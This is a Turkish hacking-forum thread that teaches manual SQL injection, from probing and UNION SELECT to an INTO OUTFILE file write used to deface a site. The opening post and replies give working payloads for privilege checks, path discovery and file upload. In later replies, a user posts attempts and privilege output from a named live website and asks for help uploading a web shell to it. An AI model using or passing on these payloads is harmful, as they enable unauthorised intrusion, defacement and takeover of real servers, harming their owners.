1. Ayyıldız Tim forumu Hariç Hiç Bir şekilde Rütbeli Oldugunu İddaa edenlere inanmayınız..⠀ Ayyıldız Tim Adına Sizden Bilgi Belge TC Kimlik Vb Evrak İsteyenlere Asla Bilgilerinizi Vermeyiniz.

Manuel Sql Injection (into Outfile) Dosya Yükleme Komutu

'Web Hacking ve Güvenlik' forumunda ismailkaya2 tarafından 10 Şubat 2019 tarihinde açılan konu

  1. ismailkaya2 Guest

    • Guest
    Katılım:
    19 Aralık 2016
    Mesaj:
    953
    Alınan Beğeniler:
    805

    Özel Mesaj
    SELAMLAR DEVRELERİM
    bugün sizlere sql injetion açığında kullanılan dosya yükleme into outfile komutunu göstericem bu konuyu
    yaparken emin olunki sizlerin bu açıkda daha çok bilgi edinmesi ve daha çok anlası için elimden geleni yapmaya çalışdım . yorum yazıcak devrelerim sorularını dile getirebilirler elimden geldiğince cevaplıyıcam
    uykusuz bi konu anlatımıda bukadar oluyor nekadar iyi olduğu takdirinize kalmış



    sql injection açığı sık rastladığımız önemli açıklardan biridir kullanmasını bilene bende sizlere bugün daha toplu ve anlaşılır bir şekile sunmaya çalışdım ve kendime bir site buldum (kopyaladığım resiler iyi çıkmamış komutları yazıcam)


    1.)ilk önce bulduğum siteyi inceledim

    [​IMG] 2.)bulduğum sitede açık varmı diye (' , " , é , and false ) bu komutlardan birtanesini koydum aynen (site.com/news/sla.php?id=4'' bu örnekteki gibi
    [​IMG]
    3.)ilk önce (site.com/news/sla.php?id=4 order by 50) yapdım ve yine hata verdi ' işaretini kaldırdım halde

    [​IMG]4.)sonrasında ise order by 50 yazdığım yeri değiştirip 4 koydum
    site.com/news/sla.php?id=4 order by 50 ---->site.com/news/sla.php?id=4 order by 4

    ve sonrasında sitedeki hatanın gittiğini gördüm
    [​IMG]5.) site.com/news/sla.php?id=4 order by 4 . burada order by 4 den sonra 5 yapıyım dedim ve 5 de hata vardi demekki bu sitenin 4 klonu var .Hemen
    site.com/news/sla.php?id=4 union select 1,2,3,4 yazdım ve sayfanın içeriği değişti

    2 ve 3 sayıları sayfanın içerik kısmında duruyordu
    [​IMG]
    6.) açıkda kod açlışdırılabiliyormu diyerek bir işlem yaptım ve üstte yazdığım 2 ve 3 sayılarından 3 sayısını seçerek
    site.com/news/sla.php?id=4 union select 1,2,version(),4
    3 sayısının üzeriden kod çalışdırdım ve bana (Ubuntu 16.04) gibi bir yazı geldi demekki
    kod çalışdırılıyormuş server version bilgisi elime geçti
    [​IMG]
    7.) (site.com/news/sla.php?id=4 union select 1,2,version(),4 ) bu sitede version() yazan yere HACKBAR da bulunan izlenen yol = Union based>Basic statements>privileges check > via I_S privilages yazısına tıklayarak
    Kod:
    (SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)
    version() yerine bu kod sadece olacak şekile yerleştiriyoruz
    [​IMG]
    7)not= o kodu yazdığınız zaman size [email protected]=Yes diye bir yazı gelicek bu demek oluyorki dosya yükleyebilirsiniz





    8) en sonunda siteye bir mesaj bırakmak istedim ve
    site.com/news/sla.php?id=4 union select 1,2,--ismailkaya hacked--,4 yazdığım ismailkaya hacked yazısını hex e çeviriyorum yani

    site.com/news/sla.php?id=4 union select 1,2,0x69736d61696c6b617961206861636b6564,4
    çevirdim ve devamında


    site.com/news/sla.php?id=4 union select 1,2,0x69736d61696c6b617961206861636b6564,4+INTO+OUTFILE+'/var/www/html/pescyte.php'

    siteye +INTO+OUTFILE+'/var/www/html/pescyte.php' eklenir . yukardaki kod da
    Kod:
    site.com/news/sla.php?id=4 union select 1,2,0x69736d61696c6b617961206861636b6564,4+INTO+OUTFILE+'/var/www/html/pescyte.php'
    yeni bir sayfa açılır ve içinde ismail kaya hacked yazar .
     
  2. KartalBeyi Guest

    • Guest
    Katılım:
    6 Nisan 2018
    Mesaj:
    276
    Alınan Beğeniler:
    1,188

    Özel Mesaj
    açıklayıcı olmuş ama eksik [email protected]=Yes yaptığın zaman yüklediğin yerde perm olmayabilir o durumlarda ne yapılacağını
    yazmamışsın konuyu takip eden arkadaşlar için açıklayayım
    site üzerinde bir resim arayıp o resimin yolunu izleyerek yüklenebilir
    ayrıca
    2. olarak
    site.com/news/sla.php?id=4 union select 1,2,0x69736d61696c6b617961206861636b6564,4+INTO+OUTFILE+'/var/www/html/pescyte.php'
    kırmızı yer olan site dizinini nasıl bulduğunuda açıklamamışsın onu bulmadığın zaman bu anlattığın işlemlerin hepsi boşa çıkıyor
    onu bulmayıda açıklayayım
    site.com/news/sla.php?id=4' or 4 (siteyle alakalı) ERROR / DOUBLE QUERY>Error Based get version yaptığın zaman
    Kod:
    site.com/news/sla.php?id=4' or 4 +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 
    şeklinde sitedeki dizinleri görebilirsin
    kolay gelsin
     
  3. ismailkaya2 Guest

    • Guest
    Katılım:
    19 Aralık 2016
    Mesaj:
    953
    Alınan Beğeniler:
    805

    Özel Mesaj
    KartalBeyi
    bilgi yardımınız için teşekkür ederim sitede perm yokdu ve resim yolunu yöneltmeyi düşünemedim
    2 nci de verdiğiniz kodu şimdi açıklığa kavuşturdum saolun
     
  4. A28 Guest

    • Guest
    Katılım:
    24 Şubat 2021
    Mesaj:
    9
    Alınan Beğeniler:
    22

    Özel Mesaj

    Benim site şu http://test.com/news.php?id=3' Union Select 1,2,,4,5,6,7,8-- -, virgüle ne koymam lazim ki dizinleri görmem için ve bende [email protected] yazdi yani shell atabilirim değil mi?
     
    Orion-Pax bunu beğendi.
  5. Artuk Bey Delta Force Yüzbaşı

    Katılım:
    25 Aralık 2020
    Mesaj:
    555
    Alınan Beğeniler:
    3,581
    Meslek:
    Web Geliştirici

    Özel Mesaj
    Orion-Pax ve wolkan bunu beğendi.
  6. A28 Guest

    • Guest
    Katılım:
    24 Şubat 2021
    Mesaj:
    9
    Alınan Beğeniler:
    22

    Özel Mesaj
    Orion-Pax ve wolkan bunu beğendi.
  7. Artuk Bey Delta Force Yüzbaşı

    Katılım:
    25 Aralık 2020
    Mesaj:
    555
    Alınan Beğeniler:
    3,581
    Meslek:
    Web Geliştirici

    Özel Mesaj
    Shell atmak istiyorsan önce yetki varmı kontrol etmelisin hangi sayılarda sorgu çalıştırabiliyorsan bir tanesini seçip şu sorguyu çalıştıracaksın file_priv daha sonra en sona gelip +from+mysql.user
     
    Orion-Pax ve wolkan bunu beğendi.
  8. Artuk Bey Delta Force Yüzbaşı

    Katılım:
    25 Aralık 2020
    Mesaj:
    555
    Alınan Beğeniler:
    3,581
    Meslek:
    Web Geliştirici

    Özel Mesaj
    ++ Ayrıca ekranda Y çıkması gerekir eğer çıkmazsa yetki yok demektedir
     
    Orion-Pax, -Atabey- ve wolkan bunu beğendi.
  9. A28 Guest

    • Guest
    Katılım:
    24 Şubat 2021
    Mesaj:
    9
    Alınan Beğeniler:
    22

    Özel Mesaj
    Komutanim ben upload yaptim http://www.site.com/site.php?id=6' Union Select 1,0x413238,3,4,5,6,7+INTO+OUTFILE+'/var/lib/mysql/A.html'-- - ama bulamiyorum html dosyasini acaba nerede? Yardim ederseniz cok sevinirim.
     
    wolkan ve Orion-Pax bunu beğendi.
  10. A28 Guest

    • Guest
    Katılım:
    24 Şubat 2021
    Mesaj:
    9
    Alınan Beğeniler:
    22

    Özel Mesaj
    Yeniden bastigimda böyle bir mesaj geliyor File '/var/lib/mysql/A.html' already exists ama sitede bulamiyorum ve yetkim de var.
     
    wolkan ve Orion-Pax bunu beğendi.
  11. Artuk Bey Delta Force Yüzbaşı

    Katılım:
    25 Aralık 2020
    Mesaj:
    555
    Alınan Beğeniler:
    3,581
    Meslek:
    Web Geliştirici

    Özel Mesaj
    Dosyanı ana dizinde oluşturmamışsın ki erişemezsin ana dizinin yolunu bulup /httpdocs/public_html/ gibi oraya kaydedecekin
     
    wolkan ve Orion-Pax bunu beğendi.
  12. A28 Guest

    • Guest
    Katılım:
    24 Şubat 2021
    Mesaj:
    9
    Alınan Beğeniler:
    22

    Özel Mesaj
    Komutanim bunu yaptim ve http://www.ubraintv.com/watchchannel.php?id=6' Union Select 1,0x3c63656e7465723e3c68313e4132383c2f68313e,3,4,5,6,7+INTO+OUTFILE+'/httpdocs/public_html/'-- - ve bu geldi Can't create/write to file '/httpdocs/public_html/' (Errcode: 2). Komutanim bide siz baksaniz aslinda yetki var bakin bu yaziyor
    Datadir :/var/lib/mysql/
    Current User :[email protected]
    horde:N
    pp_sb_db:N
    apsc:N
    admin:Y
    pma_38Dqey2QMmW9:N
    ubraintv:Y
    Komutanim siteye shell atmayin lütfen ben yapmak istiyorum, lütfen yardim edin.
     
    wolkan bunu beğendi.

Bu Sayfayı Paylaş